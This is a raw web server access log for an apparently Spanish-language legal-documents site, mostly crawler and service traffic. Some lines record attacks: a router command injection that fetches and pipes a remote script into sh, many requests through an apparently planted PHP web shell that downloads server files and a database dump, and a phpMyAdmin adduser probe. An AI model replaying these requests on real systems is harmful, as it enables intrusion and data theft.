191.104.103.98 - - [28/Jun/2024:01:15:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19fVAUhrY1VcmbPQ47ledY2G+SmWrTSUO63r3KJ2nHTHXD2sTYVk1reWysU7QUerTsbTfdXB8kOMpK4SWadAoIle24ExBEszeKnZt07YQyCyl5DN4cvSYhmSoui3bayeho+FW0zJipywv//Sy2pxd6yshDPZPY8YGPk5SUi5VbqaOiqclQRB6eZkpMV7lpSSDAjFz8EfxxNcQ72AYYU0aJO8k8vihSx0B3O3yvXatYAmNyUa63YgqI9qeQt0oJpVEMfafq90bbTSQ==&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:01:15:35 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:01:15:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/oTo/DiYxRZEK0ETcBXuiEbwkfP4LqW9zL95j7rC7hMIRN0ZstATN2/5Wvu72d4q5K7zhsIzmQe5ch96fgP2Gqlji+yeotNYnKS2PwPLo9T0Fy6Knj6/bi7DDmLeIzwm4758zOh33hwxZNkYzQLxgHXKnBDGD9VJQ=&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:01:15:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18XpJmEfYP/3HkJzs94z3GSdzrvL2mkD/bfa1N6Qa/6bv5JuLTZJT3T1g5QI835DWEBpFDh6K8U89y0+WXjLW6piowGXgwDeTW1y9duvAJnu6xMn91HQoZVP7lO1VAykikWVX+r1Zb8VB7XGUaFjUyxaPCPdXK+H8k=&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:01:15:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/pRCK5k1kz1JaS29hpVnFZP9ip4iUF7KMNt7FNzA8gsstTjEu80WCw5GAMyH5HTZWBkDexZaYib2KR9FOEK2WRzM1jFXLhbDEa9xKqNxvLEI5r2VV16JAWsnVidR1Iy6k29pgvZFWc44hgp8i1P1TWBibq3dN4DzY=&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
191.104.103.98 - - [28/Jun/2024:01:15:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+gru65JVH+3hO56ElfKe4bSr/UK0oOrJXF8BtvY60daeCY6kbyR9WQARRrcKSQjo+Sztct6YtMIpcJOK3qsI4CtIfhjxNs29UmK19lil4xwAAHJpQTuJaerliG3eMKNd2vl3iH5j+k75SCVBy+E0XJubx82YHI62LCH9txj8bAc4JmInsR/v581/pJqH7v0J6YTvr98RSBlg==&u=U2FsdGVkX18LIj36meI/JUnReTOsKqMzpHkolrgb/cI=&y=U2FsdGVkX18Raei1JFfzYhZuSLj/h8XH4eB6MNbToQRI69nenefuMSIuBlfpwKEL HTTP/1.1" 200 26
172.22.2.4 - - [28/Jun/2024:01:14:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [28/Jun/2024:01:16:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.125 - - [28/Jun/2024:01:16:05 -0500] "GET /Publicaciones/2024EE67503.pdf HTTP/1.1" 404 227
52.22.236.30 - - [28/Jun/2024:01:16:13 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [28/Jun/2024:01:16:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2889.pdf HTTP/1.1" 200 629291
66.249.66.13 - - [28/Jun/2024:01:16:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3683.pdf HTTP/1.1" 200 224790
66.249.66.11 - - [28/Jun/2024:01:16:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2622.pdf HTTP/1.1" 200 426426
185.191.127.212 - - [28/Jun/2024:01:16:23 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
152.61.128.50 - - [28/Jun/2024:01:16:46 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [28/Jun/2024:01:17:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:17:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36712
201.245.192.253 - - [28/Jun/2024:01:17:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35541
201.245.192.253 - - [28/Jun/2024:01:17:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:01:17:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3728.pdf HTTP/1.1" 200 515890
52.167.144.207 - - [28/Jun/2024:01:17:58 -0500] "GET /Publicaciones/2024EE17168.pdf HTTP/1.1" 404 227
201.245.192.253 - - [28/Jun/2024:01:18:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:01:18:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1976.pdf HTTP/1.1" 200 380877
172.22.2.4 - - [28/Jun/2024:01:17:57 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [28/Jun/2024:01:19:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:19:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [28/Jun/2024:01:19:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [28/Jun/2024:01:19:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4315.pdf HTTP/1.1" 200 469373
66.249.66.13 - - [28/Jun/2024:01:19:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4133.pdf HTTP/1.1" 200 256460
66.249.66.12 - - [28/Jun/2024:01:19:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2176.pdf HTTP/1.1" 200 355950
201.245.192.253 - - [28/Jun/2024:01:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35334
216.245.221.92 - - [28/Jun/2024:01:19:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [28/Jun/2024:01:20:02 -0500] "GET /BLA/boletinlegal/Circulares/ HTTP/1.1" 200 535
201.245.192.253 - - [28/Jun/2024:01:20:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:20:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35541
186.154.32.171 - - [28/Jun/2024:01:20:43 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
207.46.13.125 - - [28/Jun/2024:01:20:48 -0500] "GET /Publicaciones/2024EE119225.pdf HTTP/1.1" 404 228
186.154.32.171 - - [28/Jun/2024:01:20:46 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2010%2F HTTP/1.1" 200 1307967
172.22.2.4 - - [28/Jun/2024:01:19:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:21:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.154.32.171 - - [28/Jun/2024:01:21:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4744.pdf HTTP/1.1" 200 222873
3.12.251.153 - - [28/Jun/2024:01:21:18 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:21:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:01:20:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [28/Jun/2024:01:22:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:01:22:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3234.pdf HTTP/1.1" 200 1130253
66.249.66.13 - - [28/Jun/2024:01:22:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0364.pdf HTTP/1.1" 200 274560
66.249.66.13 - - [28/Jun/2024:01:22:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3051.PDF HTTP/1.1" 200 8856985
40.77.167.15 - - [28/Jun/2024:01:22:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2583.pdf HTTP/1.1" 304 -
207.46.13.153 - - [28/Jun/2024:01:23:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0040.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:01:23:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:23:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:01:23:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0978.pdf HTTP/1.1" 200 451844
66.249.66.13 - - [28/Jun/2024:01:23:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3022.PDF HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:01:24:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:24:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [28/Jun/2024:01:24:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0462.pdf HTTP/1.1" 200 711994
216.245.221.92 - - [28/Jun/2024:01:24:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:25:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:25:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:01:25:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4212.pdf HTTP/1.1" 200 337186
47.128.58.211 - - [28/Jun/2024:01:25:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+2642+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 63934
201.245.192.253 - - [28/Jun/2024:01:26:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [28/Jun/2024:01:26:13 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
47.128.116.241 - - [28/Jun/2024:01:25:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDownloads&f=autos%2813%29.csv&ft=edit HTTP/1.1" 200 1502934
172.22.2.4 - - [28/Jun/2024:01:26:13 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva+No.+1+del+10+de+Abril+de+2014.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [28/Jun/2024:01:26:13 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular+No.+14+del+11+de+Septiembre+de+2012.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [28/Jun/2024:01:26:14 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva+No.+25+del+27+de+diciembre+de+2018.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [28/Jun/2024:01:26:15 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular+No.+0015+del+7+de+Diciembre+de+2018.pdf HTTP/1.1" 404 1038
47.128.38.58 - - [28/Jun/2024:01:26:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+2515+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 34869
54.167.223.174 - - [28/Jun/2024:01:26:24 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:01:26:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3094.pdf HTTP/1.1" 200 232708
66.249.66.11 - - [28/Jun/2024:01:26:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1702.pdf HTTP/1.1" 200 287270
66.249.66.11 - - [28/Jun/2024:01:26:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3548.pdf HTTP/1.1" 200 393973
172.22.2.4 - - [28/Jun/2024:01:25:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.116.23 - - [28/Jun/2024:01:26:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5Cdmz%5C&f=uninstall.exe&ft=download&white=1 HTTP/1.1" 200 6819489
201.245.192.253 - - [28/Jun/2024:01:27:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:27:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36712
201.245.192.253 - - [28/Jun/2024:01:27:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35541
201.245.192.253 - - [28/Jun/2024:01:27:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.59.3 - - [28/Jun/2024:01:27:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=display_create_table.lib.php&ft=download&white=1 HTTP/1.1" 200 2619
172.22.2.4 - - [28/Jun/2024:01:25:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
47.128.123.233 - - [28/Jun/2024:01:28:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Crte%5C&f=rte_events.lib.php&ft=download&white=1 HTTP/1.1" 200 25606
201.245.192.253 - - [28/Jun/2024:01:28:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
199.16.157.181 - - [28/Jun/2024:01:28:15 -0500] "GET /images/presentaci%C3%B3n%20convenci%C3%B3n.jpg HTTP/1.1" 404 1034
66.249.66.12 - - [28/Jun/2024:01:28:33 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 200 40960
66.249.66.13 - - [28/Jun/2024:01:28:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4160.pdf HTTP/1.1" 200 428335
66.249.66.13 - - [28/Jun/2024:01:28:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2240.pdf HTTP/1.1" 200 448852
172.22.2.4 - - [28/Jun/2024:01:28:37 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000003%20DEL%2016%20DE%20FEBRERO%20DEL%202024.pdf HTTP/1.1" 304 -
201.245.192.253 - - [28/Jun/2024:01:29:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.233 - - [28/Jun/2024:01:29:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/server_privileges.php%27%20%20%20%20%20%20%20%20.%20PMA_URL_getCommon(array(%27adduser%27%20=%3E%201))%20%20%20%20%20%20%20%20.%20%27 HTTP/1.1" 403 1006
201.245.192.253 - - [28/Jun/2024:01:29:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.244.66.195 - - [28/Jun/2024:01:29:11 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [28/Jun/2024:01:29:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.30.203 - - [28/Jun/2024:01:28:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-snapshots&f=20150910_encuentrodelasamericas_55fe35a6a29ae2773150920042718_database.sql&ft=edit HTTP/1.1" 200 656262
201.245.192.253 - - [28/Jun/2024:01:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35334
66.249.66.11 - - [28/Jun/2024:01:29:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2894.pdf HTTP/1.1" 200 426462
66.249.66.12 - - [28/Jun/2024:01:29:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3713.pdf HTTP/1.1" 200 255926
66.249.66.12 - - [28/Jun/2024:01:29:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2245.pdf HTTP/1.1" 200 3024357
47.128.55.16 - - [28/Jun/2024:01:29:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5C&f=ctlscript.bat&ft=download&white=1 HTTP/1.1" 200 2918
207.46.13.153 - - [28/Jun/2024:01:29:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/4934.pdf HTTP/1.1" 304 -
216.245.221.92 - - [28/Jun/2024:01:29:53 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:01:30:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.32.187 - - [28/Jun/2024:01:30:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+2239+DE+2206.PDF&ft=download&white=1 HTTP/1.1" 200 20117
201.245.192.253 - - [28/Jun/2024:01:30:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35541
66.249.66.11 - - [28/Jun/2024:01:30:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1215.pdf HTTP/1.1" 200 445635
66.249.66.11 - - [28/Jun/2024:01:30:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2667.pdf HTTP/1.1" 304 -
47.128.111.238 - - [28/Jun/2024:01:30:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000207.tif&ft=download&white=1 HTTP/1.1" 200 39888
201.245.192.253 - - [28/Jun/2024:01:31:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:01:31:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.121.55 - - [28/Jun/2024:01:31:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=transformations.lib.php&ft=download&white=1 HTTP/1.1" 200 13523
3.12.251.153 - - [28/Jun/2024:01:31:30 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.13 - - [28/Jun/2024:01:31:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4256.pdf HTTP/1.1" 200 390043
168.119.101.10 - - [28/Jun/2024:01:31:47 -0500] "GET / HTTP/1.1" 200 4720
47.128.49.32 - - [28/Jun/2024:01:31:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=RESOLUCION+168+DE+2006.PDF&ft=download&white=1 HTTP/1.1" 200 269973
201.245.192.253 - - [28/Jun/2024:01:32:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.42.79 - - [28/Jun/2024:01:32:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=zip.lib.php&ft=download&white=1 HTTP/1.1" 200 6936
172.22.2.4 - - [28/Jun/2024:01:30:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:01:32:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0708.pdf HTTP/1.1" 200 323443
66.249.66.11 - - [28/Jun/2024:01:32:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1183.pdf HTTP/1.1" 200 798296
